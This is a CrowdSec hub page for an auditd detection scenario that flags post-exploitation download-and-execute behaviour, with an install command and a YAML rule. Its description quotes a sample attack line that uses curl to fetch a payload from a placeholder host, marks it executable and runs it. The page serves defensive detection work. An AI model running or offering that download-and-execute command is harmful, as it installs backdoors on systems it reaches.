auditd-postexploit-exec-from-net Scenario

« auditd-postexploit-exec-from-net »
v0.6 by crowdsecurity
Attack scenarioservice:linuxspoofable:0MITRE:T1059confidence:2

Detect post-exploitation behaviour : curl/wget and exec

Installation

cscli scenarios install crowdsecurity/auditd-postexploit-exec-from-net

Description

Attempt to detect a process that is successively invoking curl or wget and executing a non-standard payload or script.

This pattern is usually seen in post-exploitation behaviors to when downloading and executing backdoors :

curl -o /tmp/smth http://X.X.X.X/some_malware ; chmod +x /tmp/smth ; /tmp/smth

YAML Configuration

1type: conditional
2name: crowdsecurity/auditd-postexploit-exec-from-net
3description: "Detect post-exploitation behaviour : curl/wget and exec"
4filter: evt.Meta.log_type == 'execve'
5#grouping by ppid to track a process doing those action in a short timeframe
6groupby: evt.Meta.ppid
7condition: |
8  any(queue.Queue, {.Meta.exe in ["/usr/bin/wget", "/usr/bin/curl"]}) 
9  and (
10    any(queue.Queue, { !(.Meta.exe startsWith "/usr/" or .Meta.exe startsWith "/bin/" or .Meta.exe startsWith "/sbin/")})
11    or any(queue.Queue, { .Meta.exe in ["/bin/sh", "/bin/bash", "/bin/dash"] })
12  )
13leakspeed: 1s
14capacity: -1
15blackhole: 1m
16labels:
17  service: linux
18  confidence: 2
19  spoofable: 0
20  classification:
21    - attack.T1059.004
22  behavior: "linux:post-exploitation"
23  label: "Post Exploitation command execution from Internet"
24  remediation: false
25scope:
26  type: pid
27  expression: evt.Meta.ppid
28

Hub configuration

« auditd-postexploit-exec-from-net »v0.6 by crowdsecurityAttack scenarioservice:linuxspoofable:0MITRE:T1059confidence:2

« auditd-postexploit-exec-from-net »
v0.6 by crowdsecurity
Attack scenarioservice:linuxspoofable:0MITRE:T1059confidence:2